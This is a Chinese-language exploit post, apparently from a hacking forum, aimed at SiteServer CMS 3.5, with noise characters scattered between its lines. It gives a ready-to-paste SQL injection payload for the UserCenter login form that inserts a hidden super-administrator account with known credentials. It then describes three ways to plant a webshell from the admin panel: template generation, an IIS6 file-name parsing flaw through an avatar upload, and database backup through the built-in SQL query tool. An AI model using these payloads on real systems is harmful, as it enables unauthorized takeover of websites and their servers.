经测试秒杀最新的3.5版4 m' g' w1 F( a$ `# O
( H/ G5 U5 @: o1 Z& o# `1 b `
stieserver官网:www.siteserver.cn
5 c/ s: V( p! C/ P1 n; k: n9 [" x
1 j1 b/ @5 F% e( S. J
1 F3 A! C1 F5 v8 {2 e; a) C
EXP:" A% p R! \' x0 j s$ I5 a
" B7 {( ~& d! {4 G* R6 ~8 Q直接访问UserCenter/login.aspx
" r3 [8 L! Z- S4 y l+ j
- {" n% F ^9 N2 `
( J( u( N0 B3 g C; u* Q& X4 `' {7 W& x; k
用户名处输入:. O) ]# @! g5 B: z
5 M4 p$ v# d1 U
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--& m' ?0 M" Y6 ^* T" I* G* p
( A6 {2 T6 c0 m
9 A$ O$ |) ~$ l; e" d( u7 D4 ~; u4 ?2 I+ z' I
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。 f# y) o3 B3 A5 D
% l* c! P6 S! L& \% {. O
3 f# V+ ^7 K2 ?/ f, _; m/ W: R* g2 b
之后再访问后台SiteServer/login.aspx用插入的用户登陆3 }4 @. N7 a6 w% W: X
5 S( }* o ]( {7 w
+ d# J1 V: _! L( o( {' h! u
+ d# `9 Q! J( j# y# c后台拿webshell的三种方法:1 r" f3 Y# j, w1 a# n
) x' M/ n6 }- W, i* ~( X! N5 ?3 {2 `一、
K) r# [# D1 i0 Y/ L7 q' ?
7 q1 t8 ~2 c8 v% H; [ h站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx) R4 [. Q7 r6 Y3 L% d+ N
% L; [8 v& G4 X二、% V( v% ]# ]) w0 p4 ?& d) W" W
( W+ X4 Y8 A8 Z" D: k( f" a
成员权限-》添加用户-》用户名为:1.asp
, f; I) r% n/ T: o( v! G- g$ m% M W+ A) U: h
http://127.0.0.1/usercenter/
+ L) d% b& B+ z$ U% Z) I: m; E7 Q0 P# F1 q4 R7 c
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
% f9 G# Q0 _4 |0 T3 l( {( ~1 n7 R# ?: r
(ps:后台添加用户时不会验证是否含有非法字符)( Q3 _' F8 {! o" ~% \, @ [
4 \8 a5 L9 O8 P. ?& W9 ?4 m0 ~三、
, M$ u- t9 q$ v) `: H
. M2 N! j6 ~# v: g7 l) i7 { _$ s系统工具-》实用工具-》机器参数查看: r1 ~+ ~$ _! V/ M( c# X$ v
可以看到数据库类型、名称,WEB路径
" D4 |* {" B$ w! H, M/ p: h4 p5 z V. {5 P7 t- e6 c# k& Y9 t
系统工具-》数据库工具-》SQL语句查询
# w' w2 E/ R4 f# h: G/ g这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
5 a- F( H" |5 z, e$ H2 n: B% H6 Q' J. r4 V+ i
|